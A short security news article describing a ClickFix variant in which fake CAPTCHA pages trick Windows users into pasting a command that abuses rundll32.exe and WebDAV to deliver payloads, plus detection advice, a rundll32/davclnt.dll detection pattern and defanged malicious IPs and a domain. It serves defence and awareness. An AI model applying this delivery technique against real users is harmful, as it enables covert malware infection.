A new and more dangerous version of the ClickFix attack method is now actively going after Windows users This article explores threats clickfix attacks. . This new version does things differently than older ones that used PowerShell or mshta to run harmful commands.
It uses two built-in Windows components, rundll32.exe and WebDAV, to quietly deliver and run harmful payloads without setting off most security alerts. This change makes the attack harder to find, especially for companies whose defenses are mostly focused on finding script-based threats. ClickFix attacks are known for getting people to run bad commands on their own computers. In this case, the attacker makes a fake website that looks like a CAPTCHA verification page.
The site tells the visitor to press Win + R to open the Windows Run dialog, then paste a command they already copied using Ctrl + V, and finally press Enter to run it. The malware uses checks to stop debugging, such as checking the process ID and measuring the time it takes to run GetTickCount. It also changes the memory space of legitimate running processes to add code to them.
Security teams should keep a close eye on all runs of rundll32.exe that have the davclnt.dll and DavSetCookie arguments. This is a strong sign that a WebDAV-based payload is being sent. Block connections to IP addresses that are known to be malicious, such as 178.16.53[. ]137, 141.98.234[.
]27, 46.149.73[. ]60, and 91.219.23[. ]245, as well as domains that look suspicious, like mer-forgea.sightup[.]in[.]net. Organizations should also improve user awareness training that focuses on fake CAPTCHA pages and ClickFix-style social engineering attacks.
